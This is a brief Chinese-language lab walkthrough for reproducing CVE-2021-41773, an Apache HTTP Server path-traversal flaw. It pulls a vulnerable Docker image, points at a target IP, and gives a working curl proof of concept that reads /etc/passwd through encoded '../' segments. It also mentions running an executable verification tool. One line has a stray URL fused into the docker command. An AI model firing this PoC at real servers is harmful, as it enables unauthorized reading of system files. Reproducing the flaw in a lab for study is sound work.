漏洞名称:Apache HTTP Server 路径穿越漏洞-CVE-2021-41773
第一步:拉取环境、启动环境
#拉取环境
docker pull blueteamsteve/cve-2021-41773:no-cgidhttp://121.40.229.129:8080#启动环境
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
第二步:访问靶场
http://47.103.81.25:8080/
第三步:使用poc
#poc
curl http://47.103.81.25:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
第四步:准备工具CVE-2021-41773.exe,双击运行进行漏洞验证
FROM IYU_